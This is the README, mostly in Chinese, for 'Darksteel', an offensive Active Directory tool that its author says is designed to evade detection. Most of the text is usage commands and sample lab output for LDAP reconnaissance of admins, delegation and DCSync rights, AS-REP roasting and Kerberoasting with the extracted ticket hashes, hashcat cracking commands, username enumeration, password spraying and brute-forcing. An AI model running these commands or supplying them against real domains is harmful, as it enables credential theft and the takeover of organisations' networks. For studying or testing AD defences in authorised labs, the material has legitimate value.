中文 | English
Darksteel是一款域内自动化信息搜集并利用的工具。在渗透时发现单独搜集域内信息比较繁琐,漏洞利用也需要很多工具,所以完成此项目,帮助我解决域内信息搜集繁琐问题以及漏洞利用问题。此项目以规避检测为主要目的完成,直接对域控进行攻击的利用没有做,因为如果有设备会产生大量的告警,后续可能会添加bypass检测的利用。
可不填写账号密码使用本地账号进行认证查询(-d参数需要填写域名)
darksteel.exe ldap -d dc.domain.com -n domain.com -m computer
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v2.0.0
[*] Domain Computers:
WIN-KQH5FQSIJSH
DESKTOP-AO8D722
DESKTOP-DO7D913
WIN-7UI852PL
EXCHANGESERVER
ldap
当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备
kerberos
针对kerberos漏洞进行利用
blast
爆破域用户
computerip
批量查询域内计算机对应的ip
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v2.0.0
自动化域内信息搜集、kerberos利用工具
Usage:
darksteel [command]
Available Commands:
blast 爆破域内用户
completion Generate the autocompletion script for the specified shell
computerip 查询域内计算机的ip地址
help Help about any command
kerberos kerberos利用
ldap ldap查询
Flags:
-d, --dc string 域控地址
-n, --domain string 域名
-h, --help help for darksteel
Use "darksteel [command] --help" for more information about a command.
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -a
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v2.0.0
[*] Domain User:
Administrator
Guest
krbtgt
wanliu
qt
zz
xx
exchangeuser
qt01
ac
[*] Domain Admins:
CN=wanliu,CN=Users,DC=wanliu1,DC=com
CN=Administrator,CN=Users,DC=wanliu1,DC=com
[*] AdminSDHolder:
Administrator
krbtgt
wanliu
[*] sIDHistory:
[*] Enterprise Admins:
CN=Administrator,CN=Users,DC=wanliu1,DC=com
[*] OU :
Domain Controllers
Microsoft Exchange Security Groups
[*] Ca Computer:
wanliu1-WIN-KQH5FQSIJSH-CA
[*] Esc1 vulnerability template:
[*] Esc2 vulnerability template:
[*] MsSql Computer:
WIN-7UI852PL
[*] Maq Number:
10
[*] DC Computer:
WIN-KQH5FQSIJSH
[*] Acl :
qt 完全控制 ------> ac
qt 修改密码 ------> zz
qt01 拥有DCSync权限
[*] Trust Domain:
[*] Domain Computers:
WIN-KQH5FQSIJSH
DESKTOP-AO8D722
DESKTOP-DO7D913
WIN-7UI852PL
EXCHANGESERVER
[*] Survival Computer:
WIN-KQH5FQSIJSH --> Windows Server 2012 R2 Standard
DESKTOP-AO8D722 --> Windows 10 专业版
DESKTOP-DO7D913 --> Windows 10 专业版
WIN-7UI852PL --> Windows Server 2008 R2 Enterprise
EXCHANGESERVER --> Windows Server 2016 Datacenter
[*] Exchange Servers:
CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
[*] Exchange Trusted Subsystem:
CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
[*] Exchange Organization Management:
CN=Administrator,CN=Users,DC=wanliu1,DC=com
[*] Asreproast User:
xx
[*] 非约束委派机器:
CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=wanliu1,DC=com [WIN-KQH5FQSIJSH]
[*] 非约束委派用户:
CN=zz,CN=Users,DC=wanliu1,DC=com [zz]
[*] 约束委派机器:
CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com [WIN-7UI852PL]
cifs/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
cifs/WIN-KQH5FQSIJSH.wanliu1.com
cifs/WIN-KQH5FQSIJSH
cifs/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
cifs/WIN-KQH5FQSIJSH/WANLIU1
[*] 约束委派用户:
[*] 基于资源约束委派:
CN=DESKTOP-AO8D722,CN=Computers,DC=wanliu1,DC=com -> creator S-1-5-21-3163795713-59934753-1752793692-1106[qt]
CN=DESKTOP-DO7D913,CN=Computers,DC=wanliu1,DC=com -> creator S-1-5-21-3163795713-59934753-1752793692-1106[qt]
CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com -> creator S-1-5-21-3163795713-59934753-1752793692-1106[qt]
[*] SPN:CN=xx,CN=Users,DC=wanliu1,DC=com
cifs/admin
[*] SPN:CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=wanliu1,DC=com
exchangeAB/WIN-KQH5FQSIJSH
exchangeAB/WIN-KQH5FQSIJSH.wanliu1.com
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/WIN-KQH5FQSIJSH.wanliu1.com
ldap/WIN-KQH5FQSIJSH.wanliu1.com/ForestDnsZones.wanliu1.com
ldap/WIN-KQH5FQSIJSH.wanliu1.com/DomainDnsZones.wanliu1.com
TERMSRV/WIN-KQH5FQSIJSH
TERMSRV/WIN-KQH5FQSIJSH.wanliu1.com
DNS/WIN-KQH5FQSIJSH.wanliu1.com
GC/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
RestrictedKrbHost/WIN-KQH5FQSIJSH.wanliu1.com
RestrictedKrbHost/WIN-KQH5FQSIJSH
RPC/f20db9b6-b740-4670-ab3c-ead6acf58f4f._msdcs.wanliu1.com
HOST/WIN-KQH5FQSIJSH/WANLIU1
HOST/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
HOST/WIN-KQH5FQSIJSH
HOST/WIN-KQH5FQSIJSH.wanliu1.com
HOST/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
E3514235-4B06-11D1-AB04-00C04FC2DCD2/f20db9b6-b740-4670-ab3c-ead6acf58f4f/wanliu1.com
ldap/WIN-KQH5FQSIJSH/WANLIU1
ldap/f20db9b6-b740-4670-ab3c-ead6acf58f4f._msdcs.wanliu1.com
ldap/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
ldap/WIN-KQH5FQSIJSH
ldap/WIN-KQH5FQSIJSH.wanliu1.com
ldap/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
[*] SPN:CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
IMAP/EXCHANGESERVER
IMAP/exchangeserver.wanliu1.com
IMAP4/EXCHANGESERVER
IMAP4/exchangeserver.wanliu1.com
POP/EXCHANGESERVER
POP/exchangeserver.wanliu1.com
POP3/EXCHANGESERVER
POP3/exchangeserver.wanliu1.com
exchangeRFR/EXCHANGESERVER
exchangeRFR/exchangeserver.wanliu1.com
exchangeAB/EXCHANGESERVER
exchangeAB/exchangeserver.wanliu1.com
exchangeMDB/EXCHANGESERVER
exchangeMDB/exchangeserver.wanliu1.com
SMTP/EXCHANGESERVER
SMTP/exchangeserver.wanliu1.com
SmtpSvc/EXCHANGESERVER
SmtpSvc/exchangeserver.wanliu1.com
TERMSRV/EXCHANGESERVER
TERMSRV/exchangeserver.wanliu1.com
WSMAN/exchangeserver
WSMAN/exchangeserver.wanliu1.com
RestrictedKrbHost/EXCHANGESERVER
HOST/EXCHANGESERVER
RestrictedKrbHost/exchangeserver.wanliu1.com
HOST/exchangeserver.wanliu1.com
[*] SPN:CN=DESKTOP-AO8D722,CN=Computers,DC=wanliu1,DC=com
TERMSRV/DESKTOP-AO8D722
TERMSRV/DESKTOP-AO8D722.wanliu1.com
RestrictedKrbHost/DESKTOP-AO8D722
HOST/DESKTOP-AO8D722
RestrictedKrbHost/DESKTOP-AO8D722.wanliu1.com
HOST/DESKTOP-AO8D722.wanliu1.com
[*] SPN:CN=DESKTOP-DO7D913,CN=Computers,DC=wanliu1,DC=com
TERMSRV/DESKTOP-DO7D913
TERMSRV/DESKTOP-DO7D913.wanliu1.com
RestrictedKrbHost/DESKTOP-DO7D913
HOST/DESKTOP-DO7D913
RestrictedKrbHost/DESKTOP-DO7D913.wanliu1.com
HOST/DESKTOP-DO7D913.wanliu1.com
[*] SPN:CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com
WSMAN/WIN-7UI852PL
WSMAN/WIN-7UI852PL.wanliu1.com
TERMSRV/WIN-7UI852PL
TERMSRV/WIN-7UI852PL.wanliu1.com
MSSQLSvc/WIN-7UI852PL.wanliu1.com:1433
MSSQLSvc/WIN-7UI852PL.wanliu1.com
RestrictedKrbHost/WIN-7UI852PL
HOST/WIN-7UI852PL
RestrictedKrbHost/WIN-7UI852PL.wanliu1.com
HOST/WIN-7UI852PL.wanliu1.com
[*] SPN:CN=krbtgt,CN=Users,DC=wanliu1,DC=com
kadmin/changepw
[*] SPN:CN=zz,CN=Users,DC=wanliu1,DC=com
mssql/DESKTOP-AO8D722
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -z 管理员
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v1.0.8
[*] CN=Administrators,CN=Builtin,DC=test,DC=com --> 管理员对计算机/域有不受限制的完全访问权
[*] CN=Schema Admins,CN=Users,DC=test,DC=com --> 架构的指定系统管理员
[*] CN=Enterprise Admins,CN=Users,DC=test,DC=com --> 企业的指定系统管理员
[*] CN=Domain Admins,CN=Users,DC=test,DC=com --> 指定的域管理员
[*] CN=zz,CN=Users,DC=test,DC=com --> 假管理员
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -f "(objectClass=Computer)" -t cn,dNSHostName
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v1.0.8
DN: CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=test,DC=com
cn: [WIN-KQH5FQSIJSH]
dNSHostName: [WIN-KQH5FQSIJSH.test.com]
DN: CN=DESKTOP-AO8D722,CN=Computers,DC=test,DC=com
cn: [DESKTOP-AO8D722]
dNSHostName: [DESKTOP-AO8D722.test.com]
DN: CN=DESKTOP-DO7D913,CN=Computers,DC=test,DC=com
cn: [DESKTOP-DO7D913]
dNSHostName: [DESKTOP-DO7D913.test.com]
DN: CN=WIN-7UI852PL,CN=Computers,DC=test,DC=com
cn: [WIN-7UI852PL]
dNSHostName: [WIN-7UI852PL.test.com]
1、利用kerberos不需要域认证对用户密钥进行获取,可选择输出hashcat或john爆破格式(默认为hashcat)爆破出来的密码则为该用户的密码,如果不指定目标用户则需要一个域用户账号密码进行ldap查询并输出所有可利用密钥。hashcat爆破命令:hashcat -m 18200 hash.txt pass.txt --force
darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -u user -p password(hash)
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v1.0.8
[*] Target domain: test.com (192.168.1.1)
[*] Use LDAP to retreive vulnerable accounts
[*] Ask AS-Rep for user zz without pre-authentication
[*] Get a valid ticket with encryption: arcfour-hmac-md5
[*] Hashes:
[email protected]:8193197b866da1209af56fd5f4610c38$bc8ee9135bd82f0b2333
af24ae376bb014cd0400ef9b8ff0d0dbc8180c671cc6fe1290cd2c876f84352126bd7948adbc6b3f
51d85ebe1e8dfa15c53443fb835d743ce3cd3e5ac7f2549271385134bc685ffe55bdb30103cf132a
69267d9cec9201f478547892b3343c7427b83a901f6c01d877a4357d14d0384cd8b3cf2940e6e32e
a862d700499c6a7791e4fd17228a9adc5db5ebbe6e69d59bcde7f7e3fd3751ba54eda6339cb87b69
5a7a5daf5964a0e626129e8acc9b783aed7c060a4044d41f02da52bcff466a32dc465de10cc7e90c
7c5b84fcac701107da4300db4cfc36d58cc0524f23b5e16789656
darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -t zz
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v1.0.8
[*] Target domain: test.com (192.168.1.1)
[*] Ask AS-Rep for user zz without pre-authentication
[*] Get a valid ticket with encryption: arcfour-hmac-md5
[*] Hashes:
[email protected]:8193197b866da1209af56fd5f4610c38$bc8ee9135bd82f0b2333
af24ae376bb014cd0400ef9b8ff0d0dbc8180c671cc6fe1290cd2c876f84352126bd7948adbc6b3f
51d85ebe1e8dfa15c53443fb835d743ce3cd3e5ac7f2549271385134bc685ffe55bdb30103cf132a
69267d9cec9201f478547892b3343c7427b83a901f6c01d877a4357d14d0384cd8b3cf2940e6e32e
a862d700499c6a7791e4fd17228a9adc5db5ebbe6e69d59bcde7f7e3fd3751ba54eda6339cb87b69
5a7a5daf5964a0e626129e8acc9b783aed7c060a4044d41f02da52bcff466a32dc465de10cc7e90c
7c5b84fcac701107da4300db4cfc36d58cc0524f23b5e16789656
3、如果目标将用户设置了spn后,则可以将密钥输出,可选择输出hashcat或john爆破格式(默认为hashcat)爆破出来的密码则为该用户的密码,如果不指定目标用户则需要一个域用户账号密码进行ldap查询并输出所有可利用密钥。hashcat爆破命令:hashcat -m 13100 hash.txt pass.txt --force
darksteel.exe kerberos -m kerberoast -d 192.168.1.1 -n test.com -u user -p password(hash)
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v1.0.8
[*] Target domain: test.com (192.168.1.1)
[*] Use username and password/key as credentials to request a TGT
[*] Use LDAP to retreive vulnerable accounts
[*] Found 1 users to Kerberoast found in LDAP
[*] CN=zz,CN=Users,DC=test,DC=com
sAMAccountName : zz
distinguishedName : CN=zz,CN=Users,DC=test,DC=com
servicePrincipalName: mssql/DESKTOP-AO8D722
[*] Asking TGS for principal: zz
[*] Hashes:
$krb5tgs$23$*zz$WANLIU1.COM$zz*$c1c2da2dbd793dbe2f627132f992e3a7$a3f77d350104545
3a8ab2917a0961d3ca54f4e97610d00ee5cb3ac03dbc84a9831d4bbd007d143619de8ca277e36c97
7f5e672396750350a14916b5dece2daa279e47f7684b03d044e9e748f5f3ce777efe73e4df64d814
75dd1217784fe78fabe7195f5dc659520081152c045574200bfe68aad97cc6c529c3d6e57eefbbaa
f270fdcee23445ce160b4c71346753fd8464aa5e6073b8b0c9d6e3865a4f48dc61d05f9a97a4d0a5
6caf0ad0059e058e4746e260d2905e429e31ed7655c87fghtf5654f54c9e506d3b737f678f9fd2bd
68c226e61f852a6c1e35ceb3b1f6f3c78f1160ddb4ea290870eff55f4ba6ca0161a5bf5545a8da59
fe20610aafa91fbbe7b8e8f3ff715f965bd09681aa41b929f98a94f8084fca1cb98f38e718612f1e
51d779c622ae91e0ee62bd2a809b59e0031f57c2647b8ef15972015f3669a80d489139153d20312b
c8f9be5252fc6ed6dd78a22dec9458d41e6a940534d33c8ajhhgj5f36d224332fec721874e46fea7
b2397922c6cbe689ef0ff7d0cb1c9d89c975c462a746ae5d473b9cfc37fadcecc96a3907980a13b9
28cd053467090458ab0a8995e1237cef641698172d6537c2ef4e5987726d6a007b03ffec867f3ab8
5fd1ce7e89f6bc694266c61ca74e6af2200bfa3a90313bbda3282ed267e6f59d477e789e4c454f66
ac942df4461fc2bad317e23176e8cc299261c1c947dca068153b2fab47b018b2e82ba08d20078195
8149dd3b03c27ec17bee22496c7cccb3e6acd23c6e7bce62658f7274ce3eef06aa16d4c94bbfbe42
3f9e7b7254625d28c27fbf2bc07aeec63f7ebe25b49742346eea44e61478e212d719be9c98a53a1c
2657790c02654fa1c9caf5bdbb816cece4e6ce6e48c86323a8596f059b9d4e4856d52480f56272a5
a393473eaf0ab12b3e085aa97ee28311c4cd54797229522001a3e5fd5fdefgrg4e03efe691635448
392ea8275cb0916bcc205fb2376ae60008a24cdea072069ca4710d9290d77bab830cf96c97c31fb0
bab707802409efbad0bb30c6efe207c75632225a52ec757f878e8d97647c34d6703e2a94f2701739
9ba6efd18a4f714b63468810929287ca3359fff00632ab5de545667d39d6e77456c1b7df57d400a7
ec9ad23b0fc93f24f9c151d9509aeabfbb298a02865bd5d16a273fc6ffb8df14456e0b2eaf973653
895e7f51f73606294845d6a9ccab6a68b5774a706f06a692c4b619e50ac35fa48e1aadb6323c279f
68e4c6d29462bd82371a0f24744cbb43bf4ca3a6cca165fe4b4025a4b69a2208bd16eacb0a029973
86bff57b4fa0924713d7b32295096ac7cc7942299a0b5126880c768edcb7743a429ded7323941cdd
c6293d7962553c7423b465d9c1c9aae98cf14e30ff0f21e8d75275a48dc1fac5bb37987057e74f83
f7aeb47dc601826d6643f95c33c7d388a3120b08ed2864e0c0bdacfb41594cea5d286583ed2fd520
89857642a160760dca1cea4
darksteel.exe blast -m userenum -d 192.168.1.1 -n test.com -U users.txt
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v1.0.8
[+] USERNAME: [email protected]
[+] USERNAME: [email protected]
Done! Tested logins in 0.034 seconds
darksteel.exe blast -m userenum -d 192.168.1.1 -n test.com -U users.txt -v
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v1.0.8
[!] [email protected] - User does not exist
[!] [email protected] - User does not exist
[+] USERNAME: [email protected]
[+] USERNAME: [email protected]
Done! Tested logins in 0.002 seconds
darksteel.exe blast -m passspray -d 192.168.1.1 -n test.com -U users.txt -p 123456
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v1.0.8
[+] SUCCESS: [email protected]:123456
Done! Tested logins in 0.024 seconds
darksteel.exe blast -m blastpass -d 192.168.1.1 -n test.com -u zz -P pass.txt
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v1.0.8
[+] SUCCESS: [email protected]:123456
Done! Tested logins in 0.013 seconds
darksteel.exe blast -m userpass -d 192.168.1.1 -n test.com -F userpass.txt
____ ______ ____ __ __ ____ ______ ____ ____ __
/\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
\ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
\ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
\ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
\/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
v1.0.8
[+] SUCCESS: [email protected]:123456
Done! Tested logins in 0.010 seconds
darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p hash
darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p 123456 -m computer
darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p 123456 -w all
-o 保存文件(不包括自定义查询)
-l 最大查询数(默认所有)
-m 指定单独查询内容
-w 指定单独查询委派内容
darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m kerberoast
darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m kerberoast -t test
darksteel kerberos -d 192.168.1.1 -k 123.kirbi -m kerberoast -t test
darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m asreproast
darksteel kerberos -d 192.168.1.1 -n test.com -m asreproast -t test
-o 保存文件(不包括自定义查询)
-l 最大查询数(默认所有)
-e 选择加密方式(默认rc4)
-f 选择输出爆破格式(默认hashcat)
darksteel blast -m userenum -d 192.168.1.1 -n test.com -U user.txt
darksteel blast -m passspray -d 192.168.1.1 -n test.com -U user.txt -p 123456
darksteel blast -m blastpass -d 192.168.1.1 -n test.com -u admin -P password.txt
darksteel blast -m userpass -d 192.168.1.1 -n test.com -F userpassword.txt
-v 输出失败信息
-t 线程设置(默认20)
-o 输出文件
blast时如果在域内使用则可以不指定dc。目前ldap查询不支持
1、持续添加其他利用方式
2、添加其他信息搜集内容
3、修改BUG
https://github.com/jcmturner/gokrb5